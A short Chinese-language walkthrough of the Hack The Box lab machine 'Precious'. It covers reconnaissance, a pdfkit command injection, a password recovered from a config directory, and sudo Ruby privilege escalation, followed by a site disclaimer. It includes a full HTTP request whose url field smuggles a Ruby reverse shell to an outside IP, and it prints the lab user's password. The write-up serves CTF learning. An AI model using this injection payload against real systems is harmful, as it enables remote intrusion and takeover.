005.Precious

1、首先nmap扫端口，扫描过程中，访问ip地址，发现重定向到了一个域名，将该域名加入host解析，再次访问

2、抓包发现服务器采用了wkhtmltopdf 0.12.6，搜索发现这个版本存在ssrf漏洞，开始复现

wkhtmltopdf SSRF | Exploit Notes

3、没办法加载远程url，然后又在返回包发现了pdfkit

4、查看pdfkit相关poc

https://github.com/shamo0/PDFkit-CMD-Injection

通过burp repeater模块复现成功

POST / HTTP/1.1
Host: precious.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 182
Origin: http://precious.htb
Connection: close
Referer: http://precious.htb/
Upgrade-Insecure-Requests: 1
Priority: u=0, i
​
url=http%3A%2F%2F10.10.16.22%3A4444%2F%3Fname%3D%2520%60+ruby+-rsocket+-e%27spawn%28%22sh%22%2C%5B%3Ain%2C%3Aout%2C%3Aerr%5D%3D%3ETCPSocket.new%28%2210.10.16.22%22%2C4444%29%29%27%60

5、经过一番搜索，在home/.bundle下面发现了henry的密码

henry:Q3c1AqGHtoI0aXAYFH

6、现在开始提权了，通过sudo -l发现，可以使用root权限运行ruby

Ruby Privilege Escalation | Exploit Notes

我们打开ruby脚本发现他是相对路径

这样的话，按照exp我们只需要创建一个名字为dependencies.yml的文件，然后使用

sudo /usr/bin/ruby /opt/update_dependencies.yml

就可以得到root权限

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途，否则一切后果请用户自负。

本站信息来自网络，版权争议与本站无关。您必须在下载后的24个小时之内，从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序，请支持正版，购买注册，得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解！

程序来源网络，不确保不包含木马病毒等危险内容，请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱：4ablog168#gmail.com（#换成@）